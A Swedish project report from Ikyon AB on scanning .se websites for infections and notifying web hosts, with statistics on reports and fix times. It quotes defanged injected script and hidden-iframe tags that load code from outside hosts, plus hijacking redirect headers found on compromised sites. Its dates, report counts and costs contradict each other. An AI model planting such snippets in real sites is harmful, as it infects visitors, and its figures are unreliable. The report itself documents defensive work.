Säkrare hemsida med .se Jörgen Nilsson, Ikyon AB 25 februari 2014 1. Inledning Projektet “Säkrare hemsida med .se” drevs av Ikyon under perioden 2011-05-01 till 2012-05-01. Under denna period skickades 3854 rapporter ut för 1458 unika domännamn. Då webbplatser ständigt infekteras finns ett kontinerligt behov av kontroll och rapportering. 2. Mål och syfte Syftet med projektet har varit att regelbundet kontrollera samtliga webbplatser som använder en .se-domän och att rapportera eventuella intrång till berört webbhotell. Webbhotellet kan antingen själv vidta åtgärder eller kontakta kunden och be denne att vidta åtgärder. Målet var att huvudsidor skulle kontrolleras en gång per dygn och att undersidor skulle kontrolleras minst en gång per vecka. 3. Projektbeskrivning I projektet har jag tittat på fyra olika metoder för att infektera webbplatser. Med de första två metoderna, malware och virus, riskerar besökare på webbplatsen att själv bli infekterad med virus. Med de två andra metoderna riskerar besökare att skickas vidare till en webbplats som kontrolleras av hackern. Denna webbplats visar oftast reklam men skulle också kunna användas för att infektera besökaren med virus. Projektperioden var från och med 2013-01-01 till och med 2014-01-31. Virus De webbplatser som haft misstänkt innehåll har kontrollerats med flera antivirusprogram, bland annat Kaspersky och F-Prot. Att flera antivirusprogram används beror på att antivirusprogram ofta är dåliga på att upptäcka den kod som initierar spridningen av virus. Sannolikt ligger fokus för tillverkarna av antivirusprogram på den fil som i slutändan försöker installeras på besökarens dator. Oftast består det virus som hittats i detta projekt av krypterad javascriptkod Malware Med malware menas i detta projekt html-kod eller javascript-kod som anropar en extern adress innehållande kod som antingen anropar ytterligare adresser eller försöker installera skadliga program på besökarens dator. I exemplet nedan anropas sidan hxxp://addonrock.ru/Webcam.js och javascript på denna adress körs på besökarens webbläsare: <script type="text/javascript" src="hxxp://addonrock.ru/Webcam.js"> Samtliga adresser som riskerar att gå till skadliga sidor har ändrats så att http är hxxp. Detta har gjorts för att förhindra oavsiktligt klickande och blockering av antivirusprogram. Misstänkta adresser kontrolleras mot Google Safe Browsing. SERP-hijacking Med Search Engine Result Page hijacking, förkortat SERP-hijacking, “kapas” besökarens webbläsare då vissa villkor uppfylls. Oftast är villkoret att besökaren hittat den infekterade webbplatsen via Google eller annan sökmotor. Om besökaren uppfyller villkoren skickas denne vidare till en helt annan adress. Denna adress står under hackerns kontroll och visar oftast reklam i syfte att generera en inkomst till hackern. Då man inte skickas vidare om man går in direkt på webbplatsens adress kan det vara svårt för ägaren av webbplatsen att upptäcka några problem. Tydligaste indikationen på problem är uteblivna besökare. Vidarebefordringen sker med HTTP-koden 301 som används där servern ber webbläsaren att gå till en annan adress istället för att servern returnerar en hemsida. Nedanstående exempel visar hur en besökare vars header-information visar att denne närmast kommer från Google skickas vidare till hxxp://htcssilence.ru/massmedia?8: HTTP/1.1 301 Moved Permanently Date: Sat, 05 Jan 2013 18:39:44 GMT Server: Apache Location: hxxp://htcssilence.ru/massmedia?8 Connection: close Content­Type: text/html; charset=iso­8859­1 Header hijacking I början av 2013 upptäcktes en ny angreppsmetod som påverkade webbplatser med gamla versioner av Joomla. I serverns svar till webbläsaren lades en extra rad till: Refresh: 25; url="h p://www.dodonet.biz/shop/ xx " Denna kod gör att webbläsaren går vidare till angiven adress, men först efter 25 sekunders paus. Om besökaren går vidare till en annan adress inom 25 sekunder händer inte något. Detta gör att endast vissa besökare skickas vidare och liksom med SERP-hijacking kan det vara svårt för ägaren av webbplatsen att upptäcka att något är fel. 4. Leverabler Rapportering av infekterade webbplatser skedde fortlöpande, dels på webbplatsen http://sakrare.ikyon.se/, dels via e-postmeddelande till berörda webbhotell. På webbplatsen kan man få översikt över samtliga rapporter och deras status men även filtrera efter ip-nummer och e-postadress. Varje rapport har också en loggfil med mer information om intrånget. E-postmeddelande skickades en gång om dagen. Webbhotell med flera infekterade sidor fick alltså en sammanställning av de infekterade webbplatser som upptäckts sedan förra e-postmeddelandet. Med rapport menas i denna slutrapport information om att en specifik adress är infekterad. Om flera sidor under samma domännamn infekteras samtidigt genererar detta flera rapporter även om webbhotellet endast får ett e-postmeddelande. 5. Resultat Fullständig statistik över antalet scannade sidor saknas men under de sista två månaderna av projektperioden scannades i genomsnitt 3 053 267 sidor per dygn för malware och virus och 3 855 003 sidor per dygn för SERP-hijacking och Header hijacking. Totalt kontrollerades 7 286 677 unika adresser. Totalt skickades 8269 rapporter, fördelat på 2639 domännamn. Nedan följer antalet rapporter per dag uppdelat efter typ av attack. I diagrammet nedan visas de 30 e-postadresser som fick flest rapporter, hur många rapporter som totalt skickades och hur många av dem som fortfarande var aktiva vid projektperiodens slut. Den genomsnittliga tiden från att en attack rapporterades tills den var åtgärdad var 10,37 dygn. Då rapporter skickades med e-postmeddelande en gång per dygn kan det dröja upp till ett dygn från att attacken rapporterades på hemsidan tills webbhotellet fick e-postmeddelande med rapporten. Genomsnittstiden för de olika webbhotellen skiljer sig markant. Rapporter som var aktiva vid projektperiodens slut är inte medräknade. 6. Utvärdering och analys Spiken för skickade rapporter för malware 2013-04-02 berodde på ett intrång på servern med IP-nummer 212.247.61.233, tillhörande Make IT i Boras AB och med abuse-adress [email protected]. På 565 olika domännamn lades nedanstående html-kod in: <iframe src="hxxp://harakirievent.toypark.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> Detta intrång åtgärdades samma dag. Under perioden 2013-07-27 till 2013-08-08 var det högre aktivitet än vanligt med rapporterna, i genomsnitt 195 rapporter per dag. Totalt angreps 379 olika domännamn, för fem av dessa infekterades 100 sidor eller fler. 2013-12-03 skedde en ny spik för malware då 244 sidor på gsmteknik.se rapporterades som infekterade efter att nedanstående html-kod lags in: <script src="hxxp://vid1.tourismtome.com/18XeHAh8.php?id=53564268" type="text/javascript"> Webbplatsen låg vid intrånget på servern med IP-nummer 89.221.250.19 och rapporter skickades till [email protected]. Av dessa 244 sidor var 111 fortfarande infekterade vid projektperiodens slut 2014-01-31. Ytterligare sidor på samma domän rapporterades vid senare datum och gsmteknik.se står för 319 av de totalt 362 sidor som [email protected] fått rapport om men inte åtgärdat. För [email protected] fanns vid projektperiodens slut 46 aktiva rapporter varav 29 gällde styleofsweden.se. Samtliga sidor som inte åtgärdats var rapporterade under projektperiodens sista två veckor. Kostnaden för serverhyra hos Binero blev 7800 kr enligt budget. Kostnaden för serverhyra blev 8678 kr istället för budgeterade 12043 kr. Detta då tjänster under hösten flyttades från Amazon till Binero utan någon extra kostnad för projektet. 6a. Utvärdering av resultat Av 8269 rapporter var 483 aktiva efter projektperiodens slut. Bortser man från rapporter till [email protected] var ungefär hälften av dessa rapporter skickade under januari 2014. I de flesta fall åtgärdade webbhotellen de infekterade hemsidorna även om det kunde ta några dagar. Att åtgärd dröjt kan bero på helg och helgdagar, hög belastning och att man väntat på att kunden ska vidta åtgärder. 6b. Förslag på förbättringar I en del fall tar det tid innan antivirusprogrammen börjar detektera skadlig javascriptkod. Ikyon har därför efter projektperiodens slut börjat utveckla ett antivirusprogram med egna signaturer för att omedelbart efter upptäckt kunna börja scanna hemsidor efter nya intrångsmetoder. Även en blacklist är planerad, för att kunna upptäcka den html-kod som hämtar information från andra adresser som ännu inte blacklistats av Google Safe Browsing. 7. Framtida arbeten Scanningen har efter projektperiodens slut fortsatt utan avbrott. Enda skillnaden är att scanningen nu finansieras direkt av Stiftelsen för internetinfrastruktur och inte av Internetfonden. Då Stiftelsen för internetinfrastruktur sedan 2 september 2013 ansvarar för driften av toppdomänen .nu sker nu även scanning av sidor under denna toppdomän.